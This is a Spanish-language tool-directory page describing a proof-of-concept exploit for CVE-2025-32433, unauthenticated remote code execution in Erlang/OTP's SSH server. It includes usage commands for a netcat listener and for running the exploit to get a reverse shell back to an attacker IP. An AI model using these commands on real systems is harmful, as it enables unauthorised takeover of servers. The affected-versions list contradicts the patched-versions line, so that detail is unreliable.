Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE — PoC que muestra ejecución remota de código no autenticada en el servidor SSH de Erlang/OTP. Al explotar una falla en el manejo de mensajes del protocolo SSH, un atacante puede ejecutar comandos arbitrarios en el objetivo sin credenciales válidas. | Kitploit
Herramientas/GitHubGitHub/dollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubdollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

PoC que muestra ejecución remota de código no autenticada en el servidor SSH de Erlang/OTP. Al explotar una falla en el manejo de mensajes del protocolo SSH, un atacante puede ejecutar comandos arbitrarios en el objetivo sin credenciales válidas.

Ver Repositorio
31hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-32433 - Erlang/OTP SSH RCE PoC

CVE-2025-32433

Resumen

PoC que muestra ejecución remota de código no autenticada en el servidor SSH de Erlang/OTP.
Al explotar una falla en el manejo de mensajes del protocolo SSH, un atacante puede ejecutar comandos arbitrarios en el objetivo sin credenciales válidas.

  • CVE: CVE-2025-32433
  • Puntuación CVSS: 10.0 (Crítico)
  • Versiones afectadas:
    • OTP-27.3.3 y anteriores
    • OTP-26.2.5.11 y anteriores
    • OTP-25.3.2.20 y anteriores

Este problema está parcheado en OTP-27.3.3, OTP-26.2.5.11 y OTP-25.3.2.20.

Referencias

  • Advertencia de Unit42
  • Repositorio del PoC
  • Entrada en NVD

Uso

Configuración del Listener:

root@kitploit:~
nc -lvnp 1234

alt text Ejecutar Exploit:

root@kitploit:~
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  • --rhost : IP del objetivo
  • --rport : Puerto SSH del objetivo
  • --lhost : Tu IP para la shell inversa
  • --lport : Tu puerto de escucha

alt text

alt text

Descargo de responsabilidad

Este repositorio es solo para fines educativos. No uses este exploit contra sistemas que no poseas o para los cuales no tengas permiso explícito de prueba. El uso indebido puede ser ilegal y está estrictamente prohibido.

Descargar herramienta